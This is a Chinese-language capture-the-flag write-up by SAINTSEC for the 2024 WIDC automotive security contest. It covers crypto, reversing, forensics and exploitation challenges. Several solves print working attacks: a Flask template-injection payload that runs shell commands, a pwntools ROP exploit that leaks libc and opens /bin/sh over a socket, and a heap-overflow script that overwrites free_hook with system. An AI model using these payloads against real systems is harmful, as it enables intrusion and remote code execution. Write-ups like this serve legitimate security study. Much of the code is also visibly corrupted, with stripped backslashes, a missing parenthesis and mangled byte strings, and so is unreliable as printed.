2024WIDC WriteUp by SAINTSEC

admin 2024年5月24日20:52:42评论10 views字数 22462阅读74分52秒阅读模式

Day1-嵌入式程序简单逆向

逆向汇编代码得到加密逻辑为逐位将字符的ASCII码值加上3,再与9异或。将题目给的数据解base64后进行如上加密得到flag。

b64_decode_str = "lx9bma<lv]bc|azxeap:bv_k.l5:g;e9:g5g-ge:WnhNeGi=U6_-x]u^7XlpI;wZ^]"

flag = ""
for a in b64_decode_str:
    flag += chr((ord(a) + 3) ^ 9
print(flag)
#fr5lym6fpilovmtramz4lpkg8f14c7a54c1c9ca4SxbXaCeIQ0k9riqh3RfzE7sThi

Day1 -不安全的车企内网

登录时发现用户名会回显,响应头里面发现是flask,ssti,使用一下exp完成攻击

import requests

url = "http://172.10.0.21:8000/register"

payload = '''
{{lipsum.__globals__['os'].popen('cat ./flag/flag').read()}}
'''



print(requests.post(url, data={"user": payload}).text)

‍Day1-IVIServer

原题链接:

https://7ee1n.github.io/2021/11/07/BSidesAhmedabadCTF2021/

from pwn import *
context.log_level='debug'
context.binary=ELF('./server')
elf=ELF('./server')
libc=ELF('./libc-2.31.so')
SOCKFD = 4


def get(payload):
 global p 
 p = remote('pwn.bsidesahmedabad.in', 9080)
 py=flat({
  0:b'GET /',
  255: b'r',
  0x138:[
   payload
   ],
  },filler=b'x00')
 p.send(py+b'rn')

rop=ROP(elf)
rop.http_response(4,elf.got['write'])
get(rop.chain())
p.recvuntil(b'</html>nHTTP/1.1')
libcbase=u64(p.recvline().strip().ljust(8,b'x00'))- libc.symbols['write']
success(hex(libcbase))
libc.address=libcbase

rop = ROP(libc)
rop.dup2(SOCKFD, 0)
rop.dup2(SOCKFD, 1)
rop.dup2(SOCKFD, 2)
rop.system(next(libc.search(b'/bin/sh')))
get(rop.chain())

p.recvuntil(b'</html>n')

p.interactive()

2024WIDC WriteUp by  SAINTSEC

Day1-车载通信协议

由1883端口判断是mqtt协议

存在匿名访问,使用mqtt-pwn工具连接,发现有名为flag的topic

2024WIDC WriteUp by  SAINTSEC

用mqttfx客户端连接服务端,订阅flag主题,收到消息问想要什么

2024WIDC WriteUp by  SAINTSEC

发布回答flag

2024WIDC WriteUp by  SAINTSEC

收到消息,要玩猜数字游戏

2024WIDC WriteUp by  SAINTSEC

二分法猜出数字后得到flag

2024WIDC WriteUp by  SAINTSEC

Day2-车辆身份验证算法

from Crypto.Util.number import *
q = 31133702248881127631782881523509514476295949917122267121183371475000133184586174714396793644108294610935657329746903823657946536256899714076625760275173956706353888064555549064829709009640322743264038620966294636309911212621150898337629208482500384052935025619985047550270255090023343971256783414328092914248587672386617566422965425207785676797600936839556684715022346892107346366574407526099471338642307133437759220537846448437788211849588664491112404963383693116467782205041029098512207782583480993966604998421344660336431260561583879139849901548024253578304205860692342713953570388722937954933289936897205980716117
h = 7479856923878243888440888672844723062047571272556529760791388804749830947638106557467887553359594527284215983651237303197361839342245930727075103851252694200077479188468017448449313614412769738144700971711549137789290733004590838892989968103378686521773849802601405707815668581933555308957750986742176692804532749076668670300598708809281336336814136161669355533687195881130337149759522328766625901698480300656083599150462729901168306146171589266181628852056728470683680551973098848836293771016415271912573220080593590309888271888517605697277144430578513191280950815089968643259211353244436267567557456053045262878466
c = 429633025508597849623581682941413262998122137449005442145138470065847327103036727404626306379284511549714302199598866480970675273975210441015457022843111558443561825331941415126255871526201864795940071437602555024286559341823246182157480790439813986927891748029716157798569943993538191841077926115352987414280071817801043098050542082078666616788674806002113613279589438740909428444797915581688744647694596536620226032782501572321014769949362774191243994608572057792056353664666429685043726397327996076875440373242053749476708726634285972033216701275507339428064215442465140310384610569381749508378023099179079407328

A=matrix([[h,1],[q,0]])
lll=A.LLL()
g,f=lll[0]

g,f=abs(g),abs(f)
#print(g)
#print(f)

a=f*c%q
f_i=inverse_mod(f,g)
b=f_i*a %g

f=long_to_bytes(b)
print(f)

Day2-蛛丝马迹

内存取证,用volatility先scanfile找到flag.txt的位置,然后dump得到flag.txt

2024WIDC WriteUp by  SAINTSEC

2024WIDC WriteUp by  SAINTSEC

fn6ldn8kwak16bwg07abade65c253267OvAsF2gk8WPfyhTHKGxEV0BIpQX3DdRuroLlCq76jZJzYa4neat

Day2-车机堆溢出利用

from pwn import *
context.log_level = 'debug'

#p=process('./pwn')
p=remote('ip',port)

push = 0x2A3D
pop  = 0xFFFF28
change2esp = -1
value2idx = 0x10101010
sub  = 0x11111
div  = 0x514

# system = 0x08051830
system = 0x08051c60
free_hook = 0x80e09f0

heap_off = (0x110-0x8)/4


def create(d):
    return " ".join([str(x) for x in d])

payload = create([push,push,push,push,change2esp,push,sub,div,value2idx])  

payload1 = create(['$0',system,4,heap_off,free_hook])


p.sendline(payload)
p.sendline(payload1)
p.interactive()

Day2-OTA升级解密(pyc)

pyc的header不对,几个大版本的魔数试出来3.8的能正常反编译:

2024WIDC WriteUp by  SAINTSEC

然后pycdc反编译:

# Source Generated with Decompyle++
# File: 92BFABA74B71D8262D96EF9F046B8F1E.pyc (Python 3.8)

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def encrypt(plaintext, key, iv):
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), default_backend(), **('backend',))
    padder = padding.PKCS7(128).padder()
    padded_plaintext = padder.update(plaintext) + padder.finalize()
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(padded_plaintext) + encryptor.finalize()
    return base64.b64encode(ciphertext).decode()

plaintext = 'flag'
ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='
key = b'asfdsf141fsad11f'
iv = b'MDEyMzQ1Njc4OWFi'
ciphertext = encrypt(plaintext.encode(), key, iv)
print('密文:', ciphertext)

简单AES,写脚步得出flag:

import base64
from Crypto.Cipher import AES

ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='
key = b'asfdsf141fsad11f'
iv = b'MDEyMzQ1Njc4OWFi'
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(base64.b64decode(ciphertext))
flag = flag[:-flag[-1]] # unpad
print(flag)
# b'ff6jrwtydqnlkduhjg1ab9pxjv6cgb3da80c9dfb8d827YgQDvitKJT1yE3rqOB9klXf7zxcVmoHMPFeu5h0AsC2UbLSNI6Gpn4WdwRZ8jame'

Day2-硬件算法杂逆

foremost解包,解出来最后有五个文件,AES_encode是pyinstaller打包的文件,套路解包得出pyc:

$ python2 pyinstxtractor.py AES_encode
[+] Processing AES_encode
[+] Pyinstaller version: 2.1+
[+] Python version: 3.11
[+] Length of package: 8816359 bytes
[+] Found 40 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: AES_encode.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.11 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: AES_encode

You can now use a python decompiler on the pyc files within the extracted directory

因为3.11的pyc还没有支持的反编译工具,用pycdas分析出字节码再手撕:

AES_encode.pyc (Python 3.11)
[Code]
    File Name: AES_encode.py
    Object Name: <module>
    Qualified Name: <module>
    Arg Count: 0
    Pos Only Arg Count: 0
    KW Only Arg Count: 0
    Stack Size: 6
    Flags: 0x00000000
    [Names]
        'cryptography.hazmat.primitives.ciphers'
        'Cipher'
        'algorithms'
        'modes'
        'cryptography.hazmat.backends'
        'default_backend'
        'cryptography.hazmat.primitives'
        'padding'
        'simon_encode'
        'encrypt_all'
        'simon_decrypt'
        'simon_decrypt_all'
        'os'
        'generate_key'
        'aes_encrypt'
        'key'
        'open'
        'file'
        'read'
        'strip'
        'hex_key'
        'encode'
        'byte_key'
        'plaintext'
        'iv'
        'ciphertext'
        'print'
    [Locals+Names]
    [Constants]
        0
        (
            'Cipher'
            'algorithms'
            'modes'
        )
        (
            'default_backend'
        )
        (
            'padding'
        )
        (
            'encrypt_all'
        )
        (
            'simon_decrypt_all'
        )
        None
        [Code]
            File Name: AES_encode.py
            Object Name: generate_key
            Qualified Name: generate_key
            Arg Count: 0
            Pos Only Arg Count: 0
            KW Only Arg Count: 0
            Stack Size: 4
            Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
            [Names]
                'to_bytes'
            [Locals+Names]
                'original_hex'
            [Constants]
                None
                0x3836353635367830L
                32
                'big'
                (
                    'byteorder'
                )
            [Disassembly]
                0       RESUME                        0
                2       LOAD_CONST                    10x3836353635367830L
                4       STORE_FAST                    0: original_hex
                6       LOAD_FAST                     0: original_hex
                8       LOAD_METHOD                   0: to_bytes
                30      LOAD_CONST                    232
                32      LOAD_CONST                    3'big'
                34      KW_NAMES                      4
                36      PRECALL                       2
                40      CALL                          2
                50      POP_TOP                       
                52      LOAD_FAST                     0: original_hex
                54      LOAD_METHOD                   0: to_bytes
                76      LOAD_CONST                    232
                78      LOAD_CONST                    3'big'
                80      KW_NAMES                      4
                82      PRECALL                       2
                86      CALL                          2
                96      RETURN_VALUE                  
        [Code]
            File Name: AES_encode.py
            Object Name: aes_encrypt
            Qualified Name: aes_encrypt
            Arg Count: 2
            Pos Only Arg Count: 0
            KW Only Arg Count: 0
            Stack Size: 6
            Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
            [Names]
                'os'
                'urandom'
                'Cipher'
                'algorithms'
                'AES'
                'modes'
                'CBC'
                'default_backend'
                'encryptor'
                'padding'
                'PKCS7'
                'padder'
                'update'
                'finalize'
            [Locals+Names]
                'plaintext'
                'key'
                'iv'
                'cipher'
                'encryptor'
                'padder'
                'padded_plaintext'
                'ciphertext'
            [Constants]
                None
                16
                (
                    'backend'
                )
                128
            [Disassembly]
                0       RESUME                        0
                2       LOAD_GLOBAL                   1: NULL + os
                14      LOAD_ATTR                     1: urandom
                24      LOAD_CONST                    116
                26      PRECALL                       1
                30      CALL                          1
                40      STORE_FAST                    2: iv
                42      LOAD_GLOBAL                   5: NULL + Cipher
                54      LOAD_GLOBAL                   7: NULL + algorithms
                66      LOAD_ATTR                     4: AES
                76      LOAD_FAST                     1: key
                78      PRECALL                       1
                82      CALL                          1
                92      LOAD_GLOBAL                   11: NULL + modes
                104     LOAD_ATTR                     6: CBC
                114     LOAD_FAST                     2: iv
                116     PRECALL                       1
                120     CALL                          1
                130     LOAD_GLOBAL                   15: NULL + default_backend
                142     PRECALL                       0
                146     CALL                          0
                156     KW_NAMES                      2
                158     PRECALL                       3
                162     CALL                          3
                172     STORE_FAST                    3: cipher
                174     LOAD_FAST                     3: cipher
                176     LOAD_METHOD                   8: encryptor
                198     PRECALL                       0
                202     CALL                          0
                212     STORE_FAST                    4: encryptor
                214     LOAD_GLOBAL                   19: NULL + padding
                226     LOAD_ATTR                     10: PKCS7
                236     LOAD_CONST                    3128
                238     PRECALL                       1
                242     CALL                          1
                252     LOAD_METHOD                   11: padder
                274     PRECALL                       0
                278     CALL                          0
                288     STORE_FAST                    5: padder
                290     LOAD_FAST                     5: padder
                292     LOAD_METHOD                   12: update
                314     LOAD_FAST                     0: plaintext
                316     PRECALL                       1
                320     CALL                          1
                330     LOAD_FAST                     5: padder
                332     LOAD_METHOD                   13: finalize
                354     PRECALL                       0
                358     CALL                          0
                368     BINARY_OP                     0 (+)
                372     STORE_FAST                    6: padded_plaintext
                374     LOAD_FAST                     4: encryptor
                376     LOAD_METHOD                   12: update
                398     LOAD_FAST                     6: padded_plaintext
                400     PRECALL                       1
                404     CALL                          1
                414     LOAD_FAST                     4: encryptor
                416     LOAD_METHOD                   13: finalize
                438     PRECALL                       0
                442     CALL                          0
                452     BINARY_OP                     0 (+)
                456     STORE_FAST                    7: ciphertext
                458     LOAD_FAST                     2: iv
                460     LOAD_FAST                     7: ciphertext
                462     BUILD_TUPLE                   2
                464     RETURN_VALUE                  
        'flag.txt'
        'r'
        'cipflag:'
        'randomiv:'
    [Disassembly]
        0       RESUME                        0
        2       LOAD_CONST                    00
        4       LOAD_CONST                    1: ('Cipher''algorithms''modes')
        6       IMPORT_NAME                   0: cryptography.hazmat.primitives.ciphers
        8       IMPORT_FROM                   1: Cipher
        10      STORE_NAME                    1: Cipher
        12      IMPORT_FROM                   2: algorithms
        14      STORE_NAME                    2: algorithms
        16      IMPORT_FROM                   3: modes
        18      STORE_NAME                    3: modes
        20      POP_TOP                       
        22      LOAD_CONST                    00
        24      LOAD_CONST                    2: ('default_backend',)
        26      IMPORT_NAME                   4: cryptography.hazmat.backends
        28      IMPORT_FROM                   5: default_backend
        30      STORE_NAME                    5: default_backend
        32      POP_TOP                       
        34      LOAD_CONST                    00
        36      LOAD_CONST                    3: ('padding',)
        38      IMPORT_NAME                   6: cryptography.hazmat.primitives
        40      IMPORT_FROM                   7: padding
        42      STORE_NAME                    7: padding
        44      POP_TOP                       
        46      LOAD_CONST                    00
        48      LOAD_CONST                    4: ('encrypt_all',)
        50      IMPORT_NAME                   8: simon_encode
        52      IMPORT_FROM                   9: encrypt_all
        54      STORE_NAME                    9: encrypt_all
        56      POP_TOP                       
        58      LOAD_CONST                    00
        60      LOAD_CONST                    5: ('simon_decrypt_all',)
        62      IMPORT_NAME                   10: simon_decrypt
        64      IMPORT_FROM                   11: simon_decrypt_all
        66      STORE_NAME                    11: simon_decrypt_all
        68      POP_TOP                       
        70      LOAD_CONST                    00
        72      LOAD_CONST                    6None
        74      IMPORT_NAME                   12: os
        76      STORE_NAME                    12: os
        78      LOAD_CONST                    7: <CODE> generate_key
        80      MAKE_FUNCTION                 0
        82      STORE_NAME                    13: generate_key
        84      LOAD_CONST                    8: <CODE> aes_encrypt
        86      MAKE_FUNCTION                 0
        88      STORE_NAME                    14: aes_encrypt
        90      PUSH_NULL                     
        92      LOAD_NAME                     13: generate_key
        94      PRECALL                       0
        98      CALL                          0
        108     STORE_NAME                    15: key
        110     PUSH_NULL                     
        112     LOAD_NAME                     16: open
        114     LOAD_CONST                    9'flag.txt'
        116     LOAD_CONST                    10'r'
        118     PRECALL                       2
        122     CALL                          2
        132     BEFORE_WITH                   
        134     STORE_NAME                    17: file
        136     LOAD_NAME                     17: file
        138     LOAD_METHOD                   18: read
        160     PRECALL                       0
        164     CALL                          0
        174     LOAD_METHOD                   19: strip
        196     PRECALL                       0
        200     CALL                          0
        210     STORE_NAME                    20: hex_key
        212     LOAD_CONST                    6None
        214     LOAD_CONST                    6None
        216     LOAD_CONST                    6None
        218     PRECALL                       2
        222     CALL                          2
        232     POP_TOP                       
        234     JUMP_FORWARD                  11 (to 258)
        236     PUSH_EXC_INFO                 
        238     WITH_EXCEPT_START             
        240     POP_JUMP_FORWARD_IF_TRUE      4
        242     RERAISE                       2
        244     COPY                          3
        246     POP_EXCEPT                    
        248     RERAISE                       1
        250     POP_TOP                       
        252     POP_EXCEPT                    
        254     POP_TOP                       
        256     POP_TOP                       
        258     LOAD_NAME                     20: hex_key
        260     LOAD_METHOD                   21: encode
        282     PRECALL                       0
        286     CALL                          0
        296     STORE_NAME                    22: byte_key
        298     LOAD_NAME                     22: byte_key
        300     STORE_NAME                    23: plaintext
        302     PUSH_NULL                     
        304     LOAD_NAME                     14: aes_encrypt
        306     LOAD_NAME                     23: plaintext
        308     LOAD_NAME                     15: key
        310     PRECALL                       2
        314     CALL                          2
        324     UNPACK_SEQUENCE               2
        328     STORE_NAME                    24: iv
        330     STORE_NAME                    25: ciphertext
        332     PUSH_NULL                     
        334     LOAD_NAME                     26print
        336     LOAD_CONST                    11'cipflag:'
        338     LOAD_NAME                     25: ciphertext
        340     FORMAT_VALUE                  0
        342     BUILD_STRING                  2
        344     PRECALL                       1
        348     CALL                          1
        358     POP_TOP                       
        360     PUSH_NULL                     
        362     LOAD_NAME                     26print
        364     LOAD_CONST                    12'randomiv:'
        366     LOAD_NAME                     24: iv
        368     FORMAT_VALUE                  0
        370     BUILD_STRING                  2
        372     PRECALL                       1
        376     CALL                          1
        386     POP_TOP                       
        388     LOAD_CONST                    6None
        390     RETURN_VALUE 

就是个AES解密,密文和iv都在flag里,在这里面找到key就行,写脚本:

from Crypto.Cipher import AES

key = 0x3836353635367830.to_bytes(32, byteorder='big')
aes = AES.new(key, AES.MODE_CBC, b'xddx92xd2x1axb8xe2<Hxb7xfaNx94xc8x1a$xb3')
flag = aes.decrypt(b'xebxb1J:}xb6xadSx89x86xabxe7x9bsxd5xebyxf2xdexd2nxf9xa3xa8Gkxb2$BEx03x9fxa1xf7xa9x19x85Sxa8Yxe2Vx98x8dx1eux84xbd`-xcaxd4xc3Em\xd1xa1xf7i6xcbx0cx842txccx94xe6x94xeeAxb4Hxd32hxf5x13K')
print(flag)
# fplkvjfixpal7zc8h0agc93ea464d53ec012poaSm0ZUeWT16JEctXsnjdQNYyhello

Day2-汽车算法逆向解密

题目描述说了AES,密文、key和iv都给了,直接写脚本解:

import base64
from Crypto.Cipher import AES

ciphertext = base64.b64decode('w61n0tWJKuyNjBN7rX8Bx/X2hcgpYCwhmCvaYSy3Omqk1Uj1RH9NtYi66amBTQm9f9hziWC0N5wLzRkGylIWbxOv0bLOwuqmXY2TigRyzWw=')
key = base64.b64decode('7TapLcNbP8TqDWzwJElihy0TAFL/JCk7QZKtcuUKIvE=')
iv = base64.b64decode('Y64sxLZOyy0BSdBXsbzE/g==')
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(ciphertext)
print(flag)
# fvoelrnobjmfz1aknof7u24gfe5204521be119b3vOh9bsAqHGRlyXio6M0xtkEZ21nUmhelp

Day2-debug 算法逆向

密文在sec.txt里,计算flag的方法在native层的getFlag函数中

2024WIDC WriteUp by  SAINTSEC

密文也是在运行时写入的:

2024WIDC WriteUp by  SAINTSEC

密文长度56,在getFlag函数中可以知道是做了凯撒移位3+xor3的操作:

2024WIDC WriteUp by  SAINTSEC

写脚本解密:

buf = b"jm0g3{djyalj{4og3k1vequwbi:f61:6f;36:;2dkkfAWRjSv2UFDukk"

flag = []
for x in buf:
    x ^= 3
    flag.append(x)
print(bytes(flag))

凯撒上dcode:

2024WIDC WriteUp by  SAINTSEC

fk0a7udfwylfu4ia7e9rcosqxg6b2962b572658deebYQNfMr8SBDsee

Day2 - 车机的图片

后缀为apk的文件末尾有一张图片的base64:

2024WIDC WriteUp by  SAINTSEC

提取出来fix即可:

2024WIDC WriteUp by  SAINTSEC

2024WIDC WriteUp by  SAINTSEC

Day2-安全驾驶的秘密

zsteg直接得到

2024WIDC WriteUp by  SAINTSEC

fdnef8gmlmj476wye0uaw1g5ad0dc6fb6bb3fc6FQAnjXIzoykL37aUltxbdN4Ye05s6THvMggo

Day2-汽车身份验证

反编译发现aes密文,跟进找到key

2024WIDC WriteUp by  SAINTSEC

2024WIDC WriteUp by  SAINTSEC

2024WIDC WriteUp by  SAINTSEC

解密获得flag :fhol9vnxra362og8be02e6880be34cb5cmxZWQrDBTkv7ijgabPEOJN9wKRfloor

Day2-一叶障目

zip方式打开docx看到flag

2024WIDC WriteUp by  SAINTSEC

原文始发于微信公众号(SAINTSEC):2024WIDC WriteUp by SAINTSEC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月24日20:52:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2024WIDC WriteUp by SAINTSEChttps://cn-sec.com/archives/2775455.html

发表评论

匿名网友 填写信息